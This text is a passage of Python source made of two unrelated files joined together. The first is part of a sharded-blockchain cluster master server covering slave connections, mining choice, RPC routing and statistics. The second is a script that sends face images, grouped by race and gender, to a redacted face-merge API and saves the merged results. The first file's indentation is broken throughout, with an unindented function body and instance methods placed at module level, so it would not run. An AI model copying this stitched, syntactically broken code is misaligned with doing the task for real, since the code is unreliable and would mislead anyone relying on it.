                    self.env.cluster_config.MASTER.MASTER_TO_SLAVE_CONNECT_RETRY_DELAY
                )
        Logger.info("Connected to {}:{}".format(ip, port))
        return (reader, writer)
    async def __connect_to_slaves(self):
        """ Master connects to all the slaves """
        futures = []
        slaves = []
        for slave_info in self.cluster_config.get_slave_info_list():
            ip = str(ipaddress.ip_address(slave_info.ip))
            reader, writer = await self.__connect(ip, slave_info.port)

            slave = SlaveConnection(
                self.env,
                reader,
                writer,
                self,
                slave_info.id,
                slave_info.shard_mask_list,
                name="{}_slave_{}".format(self.name, slave_info.id),
            )
            await slave.wait_until_active()
            # Ping all slaves concurrently; responses gathered below.
            futures.append(slave.send_ping())
            slaves.append(slave)

        results = await asyncio.gather(*futures)

        for slave, result in zip(slaves, results):
            # Verify the slave does have the same id and shard mask list as the config file
            id, shard_mask_list = result  # NOTE(review): shadows builtin id()
            if id != slave.id:
                Logger.error(
                    "Slave id does not match. expect {} got {}".format(slave.id, id)
                )
                # NOTE(review): shutdown() resolves the shutdown future but the
                # loop continues registering this slave -- TODO confirm intended.
                self.shutdown()
            if shard_mask_list != slave.shard_mask_list:
                Logger.error(
                    "Slave {} shard mask list does not match. expect {} got {}".format(
                        slave.id, slave.shard_mask_list, shard_mask_list
                    )
                )
                self.shutdown()

            self.slave_pool.add(slave)
            for shard_id in range(self.__get_shard_size()):
                branch = Branch.create(self.__get_shard_size(), shard_id)
                if slave.has_shard(shard_id):
                    self.branch_to_slaves.setdefault(branch.value, []).append(slave)
    async def __setup_slave_to_slave_connections(self):
        """ Make slaves connect to other slaves.
        Retries until success.
        """
        for slave in self.slave_pool:
            await slave.wait_until_active()
            success = await slave.send_connect_to_slaves(
                self.cluster_config.get_slave_info_list()
            )
            if not success:
                # Any slave failing to mesh with its peers aborts the cluster.
                self.shutdown()
async def __init_shards(self):
futures = []
for slave in self.slave_pool:
futures.append(slave.send_ping(initialize_shard_state=True))
await asyncio.gather(*futures)
    async def __send_mining_config_to_slaves(self, mining):
        """Broadcast a MINE request to every slave; *mining* toggles on/off."""
        futures = []
        for slave in self.slave_pool:
            request = MineRequest(self.get_artificial_tx_config(), mining)
            futures.append(slave.write_rpc_request(ClusterOp.MINE_REQUEST, request))
        responses = await asyncio.gather(*futures)
        # Every slave must acknowledge; anything else is a fatal inconsistency.
        check(all([resp.error_code == 0 for _, resp, _ in responses]))
    async def start_mining(self):
        """Enable mining on all slaves, then start the root-chain miner."""
        await self.__send_mining_config_to_slaves(True)
        self.root_miner.start()
        Logger.warning(
            "Mining started with root block time {} s, minor block time {} s".format(
                self.get_artificial_tx_config().target_root_block_time,
                self.get_artificial_tx_config().target_minor_block_time,
            )
        )
    async def stop_mining(self):
        """Disable mining on all slaves and the root-chain miner."""
        await self.__send_mining_config_to_slaves(False)
        self.root_miner.disable()
        Logger.warning("Mining stopped")
    def get_slave_connection(self, branch):
        """Return a slave serving *branch* (currently always the first one)."""
        # TODO: Support forwarding to multiple connections (for replication)
        check(len(self.branch_to_slaves[branch.value]) > 0)
        return self.branch_to_slaves[branch.value][0]
    def __log_summary(self):
        """Log which slaves serve each shard branch."""
        for branch_value, slaves in self.branch_to_slaves.items():
            Logger.info(
                "[{}] is run by slave {}".format(
                    Branch(branch_value).get_shard_id(), [s.id for s in slaves]
                )
            )
    async def __init_cluster(self):
        """Connect slaves, mesh them together, then mark the cluster active."""
        await self.__connect_to_slaves()
        self.__log_summary()

        if not self.__has_all_shards():
            # Leaves cluster_active_future unresolved; shutdown() will later
            # set its exception.
            Logger.error("Missing some shards. Check cluster config file!")
            return

        await self.__setup_slave_to_slave_connections()
        await self.__init_shards()

        self.cluster_active_future.set_result(None)
    def start(self):
        """Schedule cluster initialization on the event loop (non-blocking)."""
        self.loop.create_task(self.__init_cluster())
    def start_and_loop(self):
        """Start the cluster and block until shutdown (or Ctrl-C)."""
        self.start()
        try:
            self.loop.run_until_complete(self.shutdown_future)
        except KeyboardInterrupt:
            pass
    def wait_until_cluster_active(self):
        # Wait until cluster is ready (raises if startup failed; see shutdown()).
        self.loop.run_until_complete(self.cluster_active_future)
    def shutdown(self):
        """Resolve the shutdown future; fail cluster startup if still pending."""
        # TODO: May set exception and disconnect all slaves
        if not self.shutdown_future.done():
            self.shutdown_future.set_result(None)
        if not self.cluster_active_future.done():
            self.cluster_active_future.set_exception(
                RuntimeError("failed to start the cluster")
            )
    def get_shutdown_future(self):
        """Future resolved when the master is shutting down."""
        return self.shutdown_future
    async def __create_root_block_to_mine_or_fallback_to_minor_block(self, address):
        """ Try to create a root block to mine or fallback to create minor block if failed proof-of-progress """
        futures = []
        for slave in self.slave_pool:
            request = GetUnconfirmedHeadersRequest()
            futures.append(
                slave.write_rpc_request(
                    ClusterOp.GET_UNCONFIRMED_HEADERS_REQUEST, request
                )
            )
        responses = await asyncio.gather(*futures)

        # Slaves may run multiple copies of the same branch
        # branch_value -> HeaderList
        shard_id_to_header_list = dict()
        for response in responses:
            _, response, _ = response
            if response.error_code != 0:
                return (None, None)
            for headers_info in response.headers_info_list:
                if headers_info.branch.get_shard_size() != self.__get_shard_size():
                    Logger.error(
                        "Expect shard size {} got {}".format(
                            self.__get_shard_size(),
                            headers_info.branch.get_shard_size(),
                        )
                    )
                    return (None, None)

                height = 0
                for header in headers_info.header_list:
                    # check headers are ordered by height
                    check(height == 0 or height + 1 == header.height)
                    height = header.height

                    # Filter out the ones unknown to the master
                    if not self.root_state.is_minor_block_validated(header.get_hash()):
                        break
                    shard_id_to_header_list.setdefault(
                        headers_info.branch.get_shard_id(), []
                    ).append(header)

        header_list = []
        # check proof of progress
        shard_ids_to_check = self.env.quark_chain_config.get_initialized_shard_ids_before_root_height(
            self.root_state.tip.height + 1
        )
        for shard_id in shard_ids_to_check:
            headers = shard_id_to_header_list.get(shard_id, [])
            header_list.extend(headers)
            if len(headers) < self.env.quark_chain_config.PROOF_OF_PROGRESS_BLOCKS:
                # Fallback to create minor block
                # Returns (None, None) when even the fallback fails.
                block = await self.__get_minor_block_to_mine(
                    Branch.create(self.__get_shard_size(), shard_id), address
                )
                return (None, None) if not block else (False, block)

        return (True, self.root_state.create_block_to_mine(header_list, address))
    async def __get_minor_block_to_mine(self, branch, address):
        """Ask the slave owning *branch* for the next minor block to mine."""
        request = GetNextBlockToMineRequest(
            branch=branch,
            address=address.address_in_branch(branch),
            artificial_tx_config=self.get_artificial_tx_config(),
        )
        slave = self.get_slave_connection(branch)
        _, response, _ = await slave.write_rpc_request(
            ClusterOp.GET_NEXT_BLOCK_TO_MINE_REQUEST, request
        )
        return response.block if response.error_code == 0 else None
async def get_next_block_to_mine(
    self, address, shard_mask_value=0, prefer_root=False, randomize_output=True
):
    """ Returns (is_root_block, block)

    shard_mask_value = 0 means considering root chain and all the shards.
    Chooses the most "economical" chain to mine next: each shard scores
    coinbase_amount / difficulty, and the root chain scores half of the
    total unconfirmed coinbase amount over the next root difficulty.
    Returns (None, None) while syncing or on any slave error.
    """
    # Mining old blocks is useless
    if self.synchronizer.running:
        return None, None

    if prefer_root and shard_mask_value == 0:
        return await self.__create_root_block_to_mine_or_fallback_to_minor_block(
            address
        )

    shard_mask = None if shard_mask_value == 0 else ShardMask(shard_mask_value)
    futures = []

    # Collect EcoInfo from shards
    for slave in self.slave_pool:
        if shard_mask and not slave.has_overlap(shard_mask):
            continue
        request = GetEcoInfoListRequest()
        futures.append(
            slave.write_rpc_request(ClusterOp.GET_ECO_INFO_LIST_REQUEST, request)
        )
    responses = await asyncio.gather(*futures)

    # Slaves may run multiple copies of the same branch
    # We only need one EcoInfo per branch
    # branch_value -> EcoInfo
    branch_value_to_eco_info = dict()
    for response in responses:
        _, response, _ = response
        if response.error_code != 0:
            return None, None
        for eco_info in response.eco_info_list:
            branch_value_to_eco_info[eco_info.branch.value] = eco_info

    # Root chain eco score: half the unconfirmed coinbase total divided by
    # the next root block difficulty.
    root_coinbase_amount = 0
    for branch_value, eco_info in branch_value_to_eco_info.items():
        root_coinbase_amount += eco_info.unconfirmed_headers_coinbase_amount
    root_coinbase_amount = root_coinbase_amount // 2

    # branch_value 0 is the sentinel for "mine the root chain"; it only
    # competes when no shard mask was given (None disables the root option).
    branch_value_with_max_eco = 0 if shard_mask is None else None
    max_eco = root_coinbase_amount / self.root_state.get_next_block_difficulty()

    dup_eco_count = 1
    block_height = 0
    for branch_value, eco_info in branch_value_to_eco_info.items():
        if shard_mask and not shard_mask.contain_branch(Branch(branch_value)):
            continue
        # TODO: Obtain block reward and tx fee
        eco = eco_info.coinbase_amount / eco_info.difficulty
        if (
            branch_value_with_max_eco is None
            or eco > max_eco
            or (
                eco == max_eco
                and branch_value_with_max_eco > 0
                and block_height > eco_info.height
            )
        ):
            branch_value_with_max_eco = branch_value
            max_eco = eco
            dup_eco_count = 1
            block_height = eco_info.height
        elif eco == max_eco and randomize_output:
            # The current block with max eco has smaller height, mine the block first
            # This should be only used during bootstrap.
            if branch_value_with_max_eco > 0 and block_height < eco_info.height:
                continue
            # Reservoir sampling: each of k equal-eco candidates wins with
            # probability 1/k.
            dup_eco_count += 1
            if random.random() < 1 / dup_eco_count:
                branch_value_with_max_eco = branch_value
                max_eco = eco

    if branch_value_with_max_eco == 0:
        return await self.__create_root_block_to_mine_or_fallback_to_minor_block(
            address
        )

    block = await self.__get_minor_block_to_mine(
        Branch(branch_value_with_max_eco), address
    )
    return (None, None) if not block else (False, block)
async def get_account_data(self, address: Address):
    """ Returns a dict where key is Branch and value is AccountBranchData """
    futures = [
        conn.write_rpc_request(
            ClusterOp.GET_ACCOUNT_DATA_REQUEST, GetAccountDataRequest(address)
        )
        for conn in self.slave_pool
    ]
    results = await asyncio.gather(*futures)

    # Slaves may run multiple copies of the same branch; keep exactly one
    # AccountBranchData entry per branch.
    branch_to_account_branch_data = dict()
    for _, resp, _ in results:
        check(resp.error_code == 0)
        for data in resp.account_branch_data_list:
            branch_to_account_branch_data[data.branch] = data

    # Every genesis shard must have reported exactly once.
    check(
        len(branch_to_account_branch_data)
        == len(self.env.quark_chain_config.get_genesis_shard_ids())
    )
    return branch_to_account_branch_data
async def get_primary_account_data(
    self, address: Address, block_height: Optional[int] = None
):
    """Fetch the AccountBranchData for the shard owning *address*.

    Returns None when no slave serves the branch or the slave's reply
    does not include it.
    """
    # TODO: Only query the shard who has the address
    shard_id = address.get_shard_id(self.__get_shard_size())
    branch = Branch.create(self.__get_shard_size(), shard_id)
    slave_list = self.branch_to_slaves.get(branch.value, None)
    if not slave_list:
        return None
    _, resp, _ = await slave_list[0].write_rpc_request(
        ClusterOp.GET_ACCOUNT_DATA_REQUEST,
        GetAccountDataRequest(address, block_height),
    )
    for data in resp.account_branch_data_list:
        if data.branch == branch:
            return data
    return None
async def add_transaction(self, tx, from_peer=None):
    """ Add transaction to the cluster and broadcast to peers

    Returns False when the source branch is unserved or any hosting slave
    rejects the tx; True otherwise. Peer broadcast failures are logged
    but never fatal.
    """
    evm_tx = tx.code.get_evm_transaction()
    evm_tx.set_shard_size(self.__get_shard_size())
    branch = Branch.create(self.__get_shard_size(), evm_tx.from_shard_id())
    slave_list = self.branch_to_slaves.get(branch.value)
    if slave_list is None:
        return False

    results = await asyncio.gather(*[s.add_transaction(tx) for s in slave_list])
    if not all(results):
        return False

    # Gossip to every peer except the one that sent us the tx.
    if self.network is not None:
        for peer in self.network.iterate_peers():
            if peer == from_peer:
                continue
            try:
                peer.send_transaction(tx)
            except Exception:
                Logger.log_exception()
    return True
async def execute_transaction(
    self, tx: Transaction, from_address, block_height: Optional[int]
) -> Optional[bytes]:
    """ Execute transaction without persistence

    Returns the execution result only when every hosting slave succeeds
    and all of them agree on the answer; otherwise None.
    """
    evm_tx = tx.code.get_evm_transaction()
    evm_tx.set_shard_size(self.__get_shard_size())
    branch = Branch.create(self.__get_shard_size(), evm_tx.from_shard_id())
    if branch.value not in self.branch_to_slaves:
        return None

    results = await asyncio.gather(
        *[
            s.execute_transaction(tx, from_address, block_height)
            for s in self.branch_to_slaves[branch.value]
        ]
    )
    # A failed execution comes back as None; also require a unanimous answer.
    if any(r is None for r in results) or len(set(results)) != 1:
        return None
    check(len(results) >= 1)
    return results[0]
def handle_new_root_block_header(self, header, peer):
    """Queue a peer-announced root block header for synchronization."""
    self.synchronizer.add_task(header, peer)
async def add_root_block(self, r_block):
    """ Add a root block locally and broadcast it to all shards.

    All root block updates should be done serially to avoid inconsistent
    global root block state.
    """
    self.root_state.validate_block(r_block)  # throw exception if failed
    update_tip = False
    try:
        update_tip = self.root_state.add_block(r_block)
        success = True
    except ValueError:
        # Invalid or unconnectable block: log it and skip the slave
        # broadcast below.
        Logger.log_exception()
        success = False

    try:
        # Best-effort tip announcement to peers; failures are deliberately
        # swallowed so a flaky peer cannot block the local update.
        if update_tip and self.network is not None:
            for peer in self.network.iterate_peers():
                peer.send_updated_tip()
    except Exception:
        pass

    if success:
        # Push the accepted block to every slave and require all of them
        # to acknowledge it.
        future_list = self.broadcast_rpc(
            op=ClusterOp.ADD_ROOT_BLOCK_REQUEST,
            req=AddRootBlockRequest(r_block, False),
        )
        result_list = await asyncio.gather(*future_list)
        check(all([resp.error_code == 0 for _, resp, _ in result_list]))
async def add_raw_minor_block(self, branch, block_data):
    """Forward serialized minor block bytes to the slave owning *branch*.

    Returns True iff the branch is served and the slave accepted the block.
    """
    if branch.value not in self.branch_to_slaves:
        return False

    # TODO: support multiple slaves running the same shard
    _, resp, _ = await self.get_slave_connection(branch).write_rpc_request(
        ClusterOp.ADD_MINOR_BLOCK_REQUEST, AddMinorBlockRequest(block_data)
    )
    return resp.error_code == 0
async def add_root_block_from_miner(self, block):
    """ Should only be called by miner

    Drops the block when it does not extend the current root tip.
    Returns True once the block has been handed to add_root_block,
    False when it was dropped as stale.
    """
    # TODO: push candidate block to miner
    if block.header.hash_prev_block != self.root_state.tip.get_hash():
        Logger.info(
            "[R] dropped stale root block {} mined locally".format(
                block.header.height
            )
        )
        return False
    await self.add_root_block(block)
    # Fix: the original returned False for the stale case but fell off the
    # end (implicit None) on success; make the result a consistent boolean.
    return True
def broadcast_command(self, op, cmd):
    """ Broadcast command to all slaves.
    """
    for conn in self.slave_pool:
        conn.write_command(
            op=op, cmd=cmd, metadata=ClusterMetadata(ROOT_BRANCH, 0)
        )
def broadcast_rpc(self, op, req):
    """ Broadcast RPC request to all slaves.

    Returns the list of response futures (one per slave connection).
    """
    return [
        conn.write_rpc_request(
            op=op, cmd=req, metadata=ClusterMetadata(ROOT_BRANCH, 0)
        )
        for conn in self.slave_pool
    ]
# ------------------------------ Cluster Peer Connection Management --------------
def get_peer(self, cluster_peer_id):
    """Look up a peer by cluster peer id; None when networking is disabled."""
    network = self.network
    if network is None:
        return None
    return network.get_peer_by_cluster_peer_id(cluster_peer_id)
async def create_peer_cluster_connections(self, cluster_peer_id):
    """Tell every slave to set up virtual connections for a new cluster peer."""
    futures = self.broadcast_rpc(
        op=ClusterOp.CREATE_CLUSTER_PEER_CONNECTION_REQUEST,
        req=CreateClusterPeerConnectionRequest(cluster_peer_id),
    )
    # TODO: Check result_list
    await asyncio.gather(*futures)
def destroy_peer_cluster_connections(self, cluster_peer_id):
    """Notify all slaves that the given cluster peer connection is gone."""
    # Broadcast connection lost to all slaves
    cmd = DestroyClusterPeerConnectionCommand(cluster_peer_id)
    self.broadcast_command(
        op=ClusterOp.DESTROY_CLUSTER_PEER_CONNECTION_COMMAND, cmd=cmd
    )
async def set_target_block_time(self, root_block_time, minor_block_time):
    """Override the mining intervals and restart mining.

    A falsy argument keeps the corresponding current interval.
    """
    current = self.artificial_tx_config
    self.artificial_tx_config = ArtificialTxConfig(
        target_root_block_time=root_block_time
        or current.target_root_block_time,
        target_minor_block_time=minor_block_time
        or current.target_minor_block_time,
    )
    await self.start_mining()
async def set_mining(self, mining):
    """Enable or disable mining across the cluster."""
    if mining:
        await self.start_mining()
        return
    await self.stop_mining()
async def create_transactions(
    self, num_tx_per_shard, xshard_percent, tx: Transaction
):
    """Create transactions and add to the network for load testing"""
    futures = [
        conn.write_rpc_request(
            ClusterOp.GEN_TX_REQUEST,
            GenTxRequest(num_tx_per_shard, xshard_percent, tx),
        )
        for conn in self.slave_pool
    ]
    responses = await asyncio.gather(*futures)
    # Every slave must acknowledge the generation request.
    check(all([resp.error_code == 0 for _, resp, _ in responses]))
def update_shard_stats(self, shard_state):
    """Cache the most recent ShardStats reported for its branch."""
    self.branch_to_shard_stats[shard_state.branch.value] = shard_state
def update_tx_count_history(self, tx_count, xshard_tx_count, timestamp):
    """ Maintain (epoch minute, tx count, xshard tx count) samples over a
    12 hour window.

    Counts falling into the newest minute bucket are merged into the last
    entry; entries older than 12 hours are evicted from the left. Note this
    also counts transactions on forks, so totals exceed a best-chain-only
    figure.
    """
    history = self.tx_count_history
    minute = int(timestamp / 60) * 60
    if history and history[-1][0] >= minute:
        # Same minute bucket as the newest sample: merge the counts.
        last_minute, last_tx, last_xshard = history.pop()
        history.append(
            (last_minute, last_tx + tx_count, last_xshard + xshard_tx_count)
        )
    else:
        history.append((minute, tx_count, xshard_tx_count))
    # Evict samples that fell out of the 12 hour window.
    while history and history[0][0] < time.time() - 3600 * 12:
        history.popleft()
async def get_stats(self):
    """Aggregate root chain, per-shard and host statistics into one dict.

    Cluster-wide totals are accumulated in a single pass over the shard
    stats (the original recomputed five separate comprehensions over the
    same values).
    """
    shards = [dict() for i in range(self.__get_shard_size())]
    tx_count60s = 0
    block_count60s = 0
    pending_tx_count = 0
    stale_block_count60s = 0
    total_tx_count = 0
    for shard_stats in self.branch_to_shard_stats.values():
        shard_id = shard_stats.branch.get_shard_id()
        shards[shard_id]["height"] = shard_stats.height
        shards[shard_id]["timestamp"] = shard_stats.timestamp
        shards[shard_id]["txCount60s"] = shard_stats.tx_count60s
        shards[shard_id]["pendingTxCount"] = shard_stats.pending_tx_count
        shards[shard_id]["totalTxCount"] = shard_stats.total_tx_count
        shards[shard_id]["blockCount60s"] = shard_stats.block_count60s
        shards[shard_id]["staleBlockCount60s"] = shard_stats.stale_block_count60s
        shards[shard_id]["lastBlockTime"] = shard_stats.last_block_time
        # Cluster-wide totals, accumulated alongside the per-shard fill.
        tx_count60s += shard_stats.tx_count60s
        block_count60s += shard_stats.block_count60s
        pending_tx_count += shard_stats.pending_tx_count
        stale_block_count60s += shard_stats.stale_block_count60s
        total_tx_count += shard_stats.total_tx_count

    root_last_block_time = 0
    if self.root_state.tip.height >= 3:
        # Interval between the tip and its parent root block.
        prev = self.root_state.db.get_root_block_by_hash(
            self.root_state.tip.hash_prev_block
        )
        root_last_block_time = (
            self.root_state.tip.create_time - prev.header.create_time
        )

    tx_count_history = [
        {"timestamp": minute, "txCount": tx, "xShardTxCount": xshard}
        for minute, tx, xshard in self.tx_count_history
    ]

    return {
        "shardServerCount": len(self.slave_pool),
        "shardSize": self.__get_shard_size(),
        "rootHeight": self.root_state.tip.height,
        "rootTimestamp": self.root_state.tip.create_time,
        "rootLastBlockTime": root_last_block_time,
        "txCount60s": tx_count60s,
        "blockCount60s": block_count60s,
        "staleBlockCount60s": stale_block_count60s,
        "pendingTxCount": pending_tx_count,
        "totalTxCount": total_tx_count,
        "syncing": self.synchronizer.running,
        "mining": self.root_miner.is_enabled(),
        "shards": shards,
        "peers": [
            "{}:{}".format(peer.ip, peer.port)
            for _, peer in self.network.active_peer_pool.items()
        ],
        "minor_block_interval": self.get_artificial_tx_config().target_minor_block_time,
        "root_block_interval": self.get_artificial_tx_config().target_root_block_time,
        "cpus": psutil.cpu_percent(percpu=True),
        "txCountHistory": tx_count_history,
    }
def is_syncing(self):
    """True while the root chain synchronizer is running."""
    return self.synchronizer.running
def is_mining(self):
    """True when the root chain miner is enabled."""
    return self.root_miner.is_enabled()
async def get_minor_block_by_hash(self, block_hash, branch):
    """Fetch a minor block by hash from the slave serving *branch*.

    Returns None when no slave serves the branch.
    """
    slaves = self.branch_to_slaves.get(branch.value)
    if slaves is None:
        return None
    return await slaves[0].get_minor_block_by_hash(block_hash, branch)
async def get_minor_block_by_height(self, height: Optional[int], branch):
    """Fetch a minor block by height from the slave serving *branch*.

    A None height means the shard's latest known height. Returns None
    when no slave serves the branch.
    """
    slaves = self.branch_to_slaves.get(branch.value)
    if slaves is None:
        return None
    if height is None:
        # use latest height if not specified
        height = self.branch_to_shard_stats[branch.value].height
    return await slaves[0].get_minor_block_by_height(height, branch)
async def get_transaction_by_hash(self, tx_hash, branch):
    """ Returns (MinorBlock, i) where i is the index of the tx in the block tx_list """
    slaves = self.branch_to_slaves.get(branch.value)
    if slaves is None:
        return None
    return await slaves[0].get_transaction_by_hash(tx_hash, branch)
async def get_transaction_receipt(
    self, tx_hash, branch
) -> Optional[Tuple[MinorBlock, int, TransactionReceipt]]:
    """Fetch (block, tx index, receipt) for *tx_hash* from the branch's slave.

    Returns None when no slave serves the branch.
    """
    slaves = self.branch_to_slaves.get(branch.value)
    if slaves is None:
        return None
    return await slaves[0].get_transaction_receipt(tx_hash, branch)
async def get_transactions_by_address(self, address, start, limit):
    """Page through transactions touching *address* on its home shard.

    Returns None when no slave currently serves the shard's branch
    (previously this raised KeyError, unlike every sibling accessor
    which returns None for an unserved branch).
    """
    branch = Branch.create(
        self.__get_shard_size(), address.get_shard_id(self.__get_shard_size())
    )
    # Guard added for consistency with the other branch-based getters.
    if branch.value not in self.branch_to_slaves:
        return None
    slave = self.branch_to_slaves[branch.value][0]
    return await slave.get_transactions_by_address(address, start, limit)
async def get_logs(
    self,
    addresses: List[Address],
    topics: List[List[bytes]],
    start_block: Union[int, str],
    end_block: Union[int, str],
    branch: Branch,
) -> Optional[List[Log]]:
    """Fetch matching logs from the slave serving *branch*.

    The string "latest" in either bound resolves to the shard's current
    height. Returns None when no slave serves the branch.
    """
    if branch.value not in self.branch_to_slaves:
        return None
    if start_block == "latest":
        start_block = self.branch_to_shard_stats[branch.value].height
    if end_block == "latest":
        end_block = self.branch_to_shard_stats[branch.value].height
    return await self.branch_to_slaves[branch.value][0].get_logs(
        branch, addresses, topics, start_block, end_block
    )
async def estimate_gas(
    self, tx: Transaction, from_address: Address
) -> Optional[int]:
    """Estimate gas for *tx* on its source shard; None when branch unserved."""
    evm_tx = tx.code.get_evm_transaction()
    evm_tx.set_shard_size(self.__get_shard_size())
    branch = Branch.create(self.__get_shard_size(), evm_tx.from_shard_id())
    slaves = self.branch_to_slaves.get(branch.value)
    if slaves is None:
        return None
    return await slaves[0].estimate_gas(tx, from_address)
async def get_storage_at(
    self, address: Address, key: int, block_height: Optional[int]
) -> Optional[bytes]:
    """Read a storage slot of *address*, optionally at a past height.

    Returns None when no slave serves the address's branch.
    """
    shard_size = self.__get_shard_size()
    branch = Branch.create(shard_size, address.get_shard_id(shard_size))
    slaves = self.branch_to_slaves.get(branch.value)
    if slaves is None:
        return None
    return await slaves[0].get_storage_at(address, key, block_height)
async def get_code(
    self, address: Address, block_height: Optional[int]
) -> Optional[bytes]:
    """Read the contract code at *address*, optionally at a past height.

    Returns None when no slave serves the address's branch.
    """
    shard_size = self.__get_shard_size()
    branch = Branch.create(shard_size, address.get_shard_id(shard_size))
    slaves = self.branch_to_slaves.get(branch.value)
    if slaves is None:
        return None
    return await slaves[0].get_code(address, block_height)
async def gas_price(self, branch: Branch) -> Optional[int]:
    """Query the gas price from the slave serving *branch*; None if unserved."""
    slaves = self.branch_to_slaves.get(branch.value)
    if slaves is None:
        return None
    return await slaves[0].gas_price(branch)
async def get_work(self, branch: Optional[Branch]) -> Optional[MiningWork]:
    """Get mining work for a shard, or the root chain when *branch* is falsy."""
    if not branch:
        # get root chain work
        return await self.root_miner.get_work()
    slaves = self.branch_to_slaves.get(branch.value)
    if slaves is None:
        return None
    return await slaves[0].get_work(branch)
async def submit_work(
    self, branch: Optional[Branch], header_hash: bytes, nonce: int, mixhash: bytes
) -> bool:
    """Submit a PoW solution for a shard, or the root chain when *branch* is falsy."""
    if not branch:
        # submit root chain work
        return await self.root_miner.submit_work(header_hash, nonce, mixhash)
    slaves = self.branch_to_slaves.get(branch.value)
    if slaves is None:
        return False
    return await slaves[0].submit_work(branch, header_hash, nonce, mixhash)
def parse_args():
    """Parse CLI arguments into a cluster Env, wiring up the master DB."""
    parser = argparse.ArgumentParser()
    ClusterConfig.attach_arguments(parser)
    env = DEFAULT_ENV.copy()
    env.cluster_config = ClusterConfig.create_from_args(parser.parse_args())

    # initialize database unless an in-memory DB was requested
    if not env.cluster_config.use_mem_db():
        env.db = PersistentDb(
            "{path}/master.db".format(path=env.cluster_config.DB_PATH_ROOT),
            clean=env.cluster_config.CLEAN,
        )
    return env
def main():
    """Cluster master entry point: start master, network and RPC servers,
    then block until shutdown."""
    from quarkchain.cluster.jsonrpc import JSONRPCServer

    env = parse_args()

    root_state = RootState(env)

    master = MasterServer(env, root_state)
    master.start()
    master.wait_until_cluster_active()

    # kick off mining
    if env.cluster_config.MINE:
        asyncio.ensure_future(master.start_mining())

    # Use the real P2P stack or the in-process simple network per config.
    network = (
        P2PNetwork(env, master)
        if env.cluster_config.use_p2p()
        else SimpleNetwork(env, master)
    )
    network.start()

    if env.cluster_config.use_p2p():
        # devp2p discovery runs on its own daemon thread
        thread = Thread(target=devp2p_app, args=[env, network], daemon=True)
        thread.start()

    public_json_rpc_server = JSONRPCServer.start_public_server(env, master)
    private_json_rpc_server = JSONRPCServer.start_private_server(env, master)

    # Block until the master signals shutdown (or the user interrupts).
    loop = asyncio.get_event_loop()
    try:
        loop.run_until_complete(master.shutdown_future)
    except KeyboardInterrupt:
        pass

    public_json_rpc_server.shutdown()
    private_json_rpc_server.shutdown()
    Logger.info("Master server is shutdown")
# Script entry point.
if __name__ == "__main__":
    main()
|
# coding = utf-8
# running in python3.6
import requests
import base64
from multiprocessing import Process

# Face-merge API endpoint (redacted).
url_test = 'http://xxxxxxx'

# Template face URL pools (contents redacted). Fixed the original's broken
# literals: `yellow_w = [` was never closed before `yellow_m = [`, and `yw`
# contained a dangling quote, both of which made this module a SyntaxError.
black_w = []
black_m = []
white_w = []
white_m = []
yellow_w = []
yellow_m = []

# Merge-source face URL pools (contents redacted).
bw = []
bm = []
ww = []
wm = []
yw = []
ym = []
def bmm():
    """Merge every black-male template with every black-male source face.

    For each merge_rate in 30..90 (step 10), POST one request per
    (template, source) pair and save any base64-decodable response body as
    'black_man_<rate>_NO<count>.jpg'. *count* numbers successfully saved
    images across all rates, matching the original unrolled code, which
    repeated the same loop body seven times with only the rate changed.
    """
    count = 0
    for rate in (30, 40, 50, 60, 70, 80, 90):
        for template_url in black_m:
            for merge_url in bm:
                params_up = {
                    "merge_url": "%s" % merge_url,
                    "template_rectangle": "",
                    "template_url": "%s" % template_url,
                    "merge_rectangle": "",
                    "merge_rate": rate,
                }
                print(params_up)
                r = requests.post(url_test, json=params_up)
                try:
                    img_data = base64.b64decode(r.text)
                    count = count + 1
                    # Context manager closes the file even on write errors.
                    with open('black_man_%s_NO%s.jpg' % (rate, count), 'wb') as f:
                        f.write(img_data)
                except Exception:
                    # Non-image (error) responses fail to decode; skip them.
                    pass
def bww():
    """Merge every black-female template with every black-female source face.

    For each merge_rate in 30..90 (step 10), POST one request per
    (template, source) pair and save any base64-decodable response body as
    'black_woman_<rate>_NO<count>.jpg'. *count* numbers successfully saved
    images across all rates, matching the original unrolled code, which
    repeated the same loop body seven times with only the rate changed.
    """
    count = 0
    for rate in (30, 40, 50, 60, 70, 80, 90):
        for template_url in black_w:
            for merge_url in bw:
                params_up = {
                    "merge_url": "%s" % merge_url,
                    "template_rectangle": "",
                    "template_url": "%s" % template_url,
                    "merge_rectangle": "",
                    "merge_rate": rate,
                }
                print(params_up)
                r = requests.post(url_test, json=params_up)
                try:
                    img_data = base64.b64decode(r.text)
                    count = count + 1
                    # Context manager closes the file even on write errors.
                    with open('black_woman_%s_NO%s.jpg' % (rate, count), 'wb') as f:
                        f.write(img_data)
                except Exception:
                    # Non-image (error) responses fail to decode; skip them.
                    pass
def www():
    """Merge every white-female template with every white-female source face.

    For each merge_rate in 30..90 (step 10), POST one request per
    (template, source) pair and save any base64-decodable response body as
    'white_woman_<rate>_NO<count>.jpg'. *count* numbers successfully saved
    images across all rates, matching the original unrolled code, which
    repeated the same loop body seven times with only the rate changed.
    """
    count = 0
    for rate in (30, 40, 50, 60, 70, 80, 90):
        for template_url in white_w:
            for merge_url in ww:
                params_up = {
                    "merge_url": "%s" % merge_url,
                    "template_rectangle": "",
                    "template_url": "%s" % template_url,
                    "merge_rectangle": "",
                    "merge_rate": rate,
                }
                print(params_up)
                r = requests.post(url_test, json=params_up)
                try:
                    img_data = base64.b64decode(r.text)
                    count = count + 1
                    # Context manager closes the file even on write errors.
                    with open('white_woman_%s_NO%s.jpg' % (rate, count), 'wb') as f:
                        f.write(img_data)
                except Exception:
                    # Non-image (error) responses fail to decode; skip them.
                    pass
def wmm():
    """Merge every white-male template with every white-male source face.

    For each merge_rate in 30..90 (step 10), POST one request per
    (template, source) pair and save any base64-decodable response body as
    'white_man_<rate>_NO<count>.jpg'. *count* numbers successfully saved
    images across all rates, matching the original unrolled code, which
    repeated the same loop body seven times with only the rate changed.
    """
    count = 0
    for rate in (30, 40, 50, 60, 70, 80, 90):
        for template_url in white_m:
            for merge_url in wm:
                params_up = {
                    "merge_url": "%s" % merge_url,
                    "template_rectangle": "",
                    "template_url": "%s" % template_url,
                    "merge_rectangle": "",
                    "merge_rate": rate,
                }
                print(params_up)
                r = requests.post(url_test, json=params_up)
                try:
                    img_data = base64.b64decode(r.text)
                    count = count + 1
                    # Context manager closes the file even on write errors.
                    with open('white_man_%s_NO%s.jpg' % (rate, count), 'wb') as f:
                        f.write(img_data)
                except Exception:
                    # Non-image (error) responses fail to decode; skip them.
                    pass
